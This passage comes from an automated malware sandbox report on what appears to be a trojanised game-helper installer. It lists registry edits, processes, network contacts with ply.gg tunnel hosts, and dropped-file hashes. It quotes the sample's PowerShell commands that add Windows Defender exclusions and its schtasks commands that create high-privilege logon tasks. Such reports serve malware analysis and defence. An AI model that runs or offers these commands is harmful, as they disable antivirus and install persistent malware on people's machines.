| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\CLSID\ = "{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}" | C:\Windows\System32\DxDiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\ = "DxDiagClassObject Class" | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1\CLSID | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CLSID | C:\Windows\System32\DxDiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CurVer\ = "DxDiag.DxDiagClassObject.1" | C:\Windows\System32\DxDiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\ = "DxDiagProvider Class" | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1 | C:\Windows\System32\DxDiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ProgID\ = "DxDiag.DxDiagClassObject.1" | C:\Windows\System32\DxDiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\VersionIndependentProgID\ = "DxDiag.DxDiagClassObject" | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\ProgID | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\VersionIndependentProgID | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1263212995-3575756360-1418101905-1000\{968C83BC-C5A3-4A77-99E9-EF552CB3CFFA} | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B} | C:\Windows\System32\DxDiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ForceRemove\ = "Programmable" | C:\Windows\System32\DxDiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ = "C:\\Windows\\System32\\dxdiagn.dll" | C:\Windows\System32\DxDiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\System32\DxDiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1\ = "DxDiagProvider Class" | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ForceRemove | C:\Windows\System32\DxDiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ = "DxDiagClassObject Class" | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\ProgID | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider.1 | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CurVer | C:\Windows\System32\DxDiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagProvider\CurVer\ = "DxDiag.DxDiagClassObject.1" | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject.1\CLSID | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7}\InprocServer32 | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1263212995-3575756360-1418101905-1000\{B3E44E69-972B-40A0-B622-9184BC2F8E1C} | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CLSID | C:\Windows\System32\DxDiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CLSID\ = "{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}" | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\CurVer | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\VersionIndependentProgID | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EEB1CAE3-D0B2-446E-AEDE-727AA9089A1B}\InprocServer32 | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A65B8071-3BFE-4213-9A5B-491DA4461CA7} | C:\Windows\System32\DxDiag.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID | C:\Windows\System32\DxDiag.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\DxDiag.DxDiagClassObject\ = "DxDiagClassObject Class" | C:\Windows\System32\DxDiag.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OWinstaller.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OWinstaller.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OWinstaller.exe | N/A |
| N/A | N/A | C:\Windows\System32\DxDiag.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Porofessor_Setup.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Porofessor_Setup.exe"
C:\Program Files\WinRAR\Temp\Updater.exe
"C:\Program Files\WinRAR\Temp\Updater.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\Node64.exe'
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OWinstaller.exe
"C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OWinstaller.exe" Sel=1&Partner=3776&Extension=pibhbkkgefgheeglaeemkkfjlhidhcedalapdggh&Name=Porofessor.gg&UtmSource=porofessor-website&UtmMedium=download-button&UtmCampaign=download-button&Referer=porofessor.gg&Browser=chrome -partnerCustomizationLevel 0 --app-name="Porofessor" -exepath C:\Program Files\WinRAR\Temp\Updater.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /F /TN "Node64" /SC ONLOGON /TR "C:\Program Files\Node64.exe" /RL HIGHEST
C:\Windows\System32\DxDiag.exe
"C:\Windows\System32\DxDiag.exe" /tC:\Users\Admin\AppData\Local\Overwolf\Temp\DxDiagOutput.txt
C:\Program Files\Node64.exe
"C:\Program Files\Node64.exe"
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node32.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node32" /SC ONLOGON /TR "C:\Windows\System32\$Node32.exe" /RL HIGHEST
C:\Windows\System32\$Node32.exe
"C:\Windows\System32\$Node32.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node2Json.exe'
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node2Json" /SC ONLOGON /TR "C:\Windows\System32\$Node2Json.exe" /RL HIGHEST
C:\Windows\System32\$Node2Json.exe
"C:\Windows\System32\$Node2Json.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node3Json.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node3Json" /SC ONLOGON /TR "C:\Windows\System32\$Node3Json.exe" /RL HIGHEST
C:\Windows\System32\$Node3Json.exe
"C:\Windows\System32\$Node3Json.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{0b9d97cd-70d0-4750-963d-4863934568ef}
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.203.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | analyticsnew.overwolf.com | udp |
| GB | 54.230.10.62:80 | analyticsnew.overwolf.com | tcp |
| US | 8.8.8.8:53 | 62.10.230.54.in-addr.arpa | udp |
| GB | 216.58.204.78:80 | www.google-analytics.com | tcp |
| GB | 54.230.10.62:443 | analyticsnew.overwolf.com | tcp |
| US | 8.8.8.8:53 | 78.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.226.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 235.3.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | visit-kill.gl.at.ply.gg | udp |
| US | 147.185.221.23:51861 | visit-kill.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | every-bend.gl.at.ply.gg | udp |
| US | 147.185.221.21:48150 | every-bend.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 147.185.221.23:51861 | visit-kill.gl.at.ply.gg | tcp |
| US | 147.185.221.21:48150 | every-bend.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 216.203.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 147.185.221.23:51861 | visit-kill.gl.at.ply.gg | tcp |
| US | 147.185.221.21:48150 | every-bend.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 147.185.221.23:51861 | visit-kill.gl.at.ply.gg | tcp |
| US | 147.185.221.21:48150 | every-bend.gl.at.ply.gg | tcp |
| US | 147.185.221.23:51861 | visit-kill.gl.at.ply.gg | tcp |
| US | 147.185.221.21:48150 | every-bend.gl.at.ply.gg | tcp |
Files
memory/1300-398-0x000002A4E1260000-0x000002A4E1261000-memory.dmp
memory/1300-397-0x000002A4E1260000-0x000002A4E1261000-memory.dmp
memory/1300-406-0x000002A4E1260000-0x000002A4E1261000-memory.dmp
memory/1300-404-0x000002A4E1260000-0x000002A4E1261000-memory.dmp
memory/1300-410-0x000002A4E1260000-0x000002A4E1261000-memory.dmp
memory/1300-408-0x000002A4E1260000-0x000002A4E1261000-memory.dmp
memory/1300-409-0x000002A4E1260000-0x000002A4E1261000-memory.dmp
memory/1300-407-0x000002A4E1260000-0x000002A4E1261000-memory.dmp
memory/1300-405-0x000002A4E1260000-0x000002A4E1261000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1bb3948f455f76085a320e6ecf3b884d |
| SHA1 | 9b3629bb1814ebd5d6143eaee9a7447767974b5f |
| SHA256 | ab7956ac7fb0780b1c36bdd9f1574e9d6a75eb8a84e4db0d5a19bc4101cc44a0 |
| SHA512 | 17f0324dbf79462f1d4da9ccec167289e719595dc82afeae05b0a1309b5ce5e7c446dbace832db3642fac07896bee80714cd893dc0c9b48b7fbec38c91363f6b |
C:\Windows\System32\$Node2Json.exe
| MD5 | 41814c2aa6f0aaffaaaa26ffd07b3550 |
| SHA1 | ea9731c42a382ed003b5b4bfd28c3ba437c8d14a |
| SHA256 | da2926ac30bda874255c093b58a8a4efa4b8e7872393ea4a242f17a4e3ab014e |
| SHA512 | f2513d8e10536bd747dd1ec4a6aa9ec0007ea9a4484c364b2cf9d5ffd42cf3bcd0e346040d4c34c3dba28a208752b82c41bdae2a9dd88ebc1ba869cd1907877d |
memory/2004-461-0x0000000000830000-0x0000000000852000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e2844b0cc903fcf9cb8f75bbb2c74293 |
| SHA1 | 61dd6066b0f4ac530680955ebdb0a85891d7e874 |
| SHA256 | b525765eef8dcc4c01eab3e0781c66ddd59526bb27d2d85bdd12555bb66e6187 |
| SHA512 | 0d68c027296e019ee580e8d523f335be52dead99cd1c66331fc4c853037c271d9a50ad31eb07b6344aab9e5baae37fac868bbd0497184a8b46dd9ab30c6c6497 |
C:\Windows\System32\$Node3Json.exe
| MD5 | 391d4f99d0076ce566b370f1572ef670 |
| SHA1 | 0bf04beb77440315098bacf30563a6542e254a45 |
| SHA256 | b55dbc5b3437654eca9fd1ea4826f81bde74af9e0c69109c25188461eb6a3605 |
| SHA512 | 1952fa90fc139863381c15f424a8146335cbbc6f443efcdffc502f1064889a244fa7da1b30ebd4c9b2bec15fd55d367a2aa80afd576b1e2c4baed40ffec76497 |
memory/3140-491-0x0000000000AD0000-0x0000000000AF2000-memory.dmp
memory/908-493-0x000001F527610000-0x000001F52763A000-memory.dmp
memory/908-494-0x00007FF9F47B0000-0x00007FF9F49A8000-memory.dmp
memory/908-495-0x00007FF9F2BA0000-0x00007FF9F2C5D000-memory.dmp
memory/620-499-0x0000000140000000-0x0000000140008000-memory.dmp
memory/620-498-0x0000000140000000-0x0000000140008000-memory.dmp
memory/620-497-0x0000000140000000-0x0000000140008000-memory.dmp
memory/620-496-0x0000000140000000-0x0000000140008000-memory.dmp
memory/620-503-0x0000000140000000-0x0000000140008000-memory.dmp
memory/620-504-0x00007FF9F47B0000-0x00007FF9F49A8000-memory.dmp
memory/620-505-0x00007FF9F2BA0000-0x00007FF9F2C5D000-memory.dmp
memory/620-506-0x0000000140000000-0x0000000140008000-memory.dmp
memory/624-510-0x00000251F5C30000-0x00000251F5C5A000-memory.dmp
memory/624-517-0x00007FF9B4830000-0x00007FF9B4840000-memory.dmp
memory/624-516-0x00000251F5C30000-0x00000251F5C5A000-memory.dmp
memory/624-511-0x00000251F5C30000-0x00000251F5C5A000-memory.dmp
memory/624-509-0x00000251F5BA0000-0x00000251F5BC5000-memory.dmp
memory/676-527-0x00007FF9B4830000-0x00007FF9B4840000-memory.dmp
memory/676-526-0x000001D51FE00000-0x000001D51FE2A000-memory.dmp
memory/676-521-0x000001D51FE00000-0x000001D51FE2A000-memory.dmp
memory/956-531-0x0000028338BD0000-0x0000028338BFA000-memory.dmp
memory/956-537-0x00007FF9B4830000-0x00007FF9B4840000-memory.dmp
memory/956-536-0x0000028338BD0000-0x0000028338BFA000-memory.dmp
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | 4ac1741ceb19f5a983079b2c5f344f5d |
| SHA1 | f1ebd93fbade2e035cd59e970787b8042cdd0f3b |
| SHA256 | 7df73f71214cdd2f2d477d6c2c65f6e4c2f5955fc669cde9c583b0ff9553ecdc |
| SHA512 | 583706069a7c0b22926fa22fc7bedcca9d6750d1542a1125b688fbb0595baf6cefc76e7b6e49c1415c782a21d0dd504c78fa36efad5f29f2fd5d69cc45ad8dcd |
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
| MD5 | a9124c4c97cba8a07a8204fac1696c8e |
| SHA1 | 1f27d80280e03762c7b16781608786f5a98ff434 |
| SHA256 | 8ad3d28aeff847bc5fb8035cbc7c71e88a4ee547821a8e1a3ea6661ee6014b21 |
